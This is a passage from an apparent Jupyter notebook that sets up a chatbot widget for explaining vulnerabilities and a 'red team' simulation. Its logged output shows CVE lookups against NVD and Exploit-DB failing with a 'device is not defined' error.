            display(HTML("<i>⚙️ Generating red team analysis... Please wait.</i>"))

        # Run generation
        bot_response = get_chatbot_response(user_query)

        # Clear the "generating" message and display final response
        with chat_history:
            chat_history.clear_output(wait=True)
            display(HTML(f"<blockquote><b>You:</b> {user_query}</blockquote>"))
            display(Markdown(bot_response))
            print("\n--- Analysis Complete ---")

    input_box.on_submit(handle_submit)
    print("✅ RED TEAM SIMULATION ENGINE IS READY (Unsloth Optimized)")
    display(input_box, chat_history)
else:
    print("❌ Chatbot cannot start. Key components are missing.")
    print("Ensure previous cells (PDF upload, chunking, model loading, and extraction) ran successfully.")


✅ Loaded summarized_vulnerability_report.md for grounding.
✅ SANITIZED VULNERABILITY EXPLAINER IS READY (no exploit commands will be produced)


Text(value='', description='Your Query:', layout=Layout(width='90%'), placeholder='Ask for vulnerability expla…

Output(layout=Layout(width='95%'))

[*] Model generation error: name 'device' is not defined
[*] Detected CVE: CVE-2023-51443 — retrieving reference context (safe use).
[*] User Query: 'CVE-2023-51443'
[*] Query Intent Classified as: 'vulnerability_details'
--> Searching in Database #1b (CISA & Exploit-DB)...
--> Also searching in Database #1a (NVD)...
[*] Model generation error: name 'device' is not defined
[*] Detected CVE: CVE-2023-51443 — retrieving reference context (safe use).
[*] User Query: 'CVE-2023-51443'
[*] Query Intent Classified as: 'vulnerability_details'
--> Searching in Database #1b (CISA & Exploit-DB)...
--> Also searching in Database #1a (NVD)...
[*] Model generation error: name 'device' is not defined
